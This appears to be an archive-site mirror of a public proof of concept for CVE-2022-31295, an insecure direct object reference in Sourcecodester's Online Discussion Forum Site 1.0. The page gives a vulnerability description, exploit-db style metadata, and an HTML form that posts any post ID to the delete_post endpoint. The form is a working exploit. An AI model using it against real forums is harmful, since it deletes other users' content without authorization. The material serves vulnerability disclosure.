CVE-2022-31295 PoC — Online Discussion Forum Site 安全漏洞

Source

https://github.com/bigzooooz/CVE-2022-31295

Associated Vulnerability

Title:Online Discussion Forum Site 安全漏洞 (CVE-2022-31295)
Description:Sourcecodester Online Discussion Forum Site是Sourcecodester的一个应用系统。一个在线讨论论坛。 Online Discussion Forum Site 存在安全漏洞。攻击者利用该漏洞通过delete_post()函数删除任意帖子。

Description

Online Discussion Forum Site 1.0 - IDOR / Delete any post

Readme

# CVE-2022-31295

Online Discussion Forum Site 1.0 - IDOR / Delete any post

#### Exploit Title: Online Discussion Forum Site 1.0 - IDOR / Delete any post
#### Date: 2022-06-13
#### CVE: CVE-2022-31295
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://www.sourcecodester.com/
#### Software Link: https://www.sourcecodester.com/php/15337/online-discussion-forum-site-phpoop-free-source-code.html
#### Version: 1.0
#### Tested on: LAMP, Ubuntu

-----


[#] Vulnerability Location:
	`function delete_post()` in `/odfs/classes/Maset.php:133`

----

[#] Exploitation:
	```
	 <form action="http://localhost/odfs/classes/Master.php?f=delete_post" method="post" id="manage-user">	
				<input type="text" name="id" value="" placeholder="enter POST ID to delete" required>
                <button type="submit">Delete Post</button>
	</form>
	```

File Snapshot


 [4.0K]  /data/pocs/6911230fadbe8bab46bd6b00996a340237fa8d79
├── [ 300]  deletePost.html
└── [ 862]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!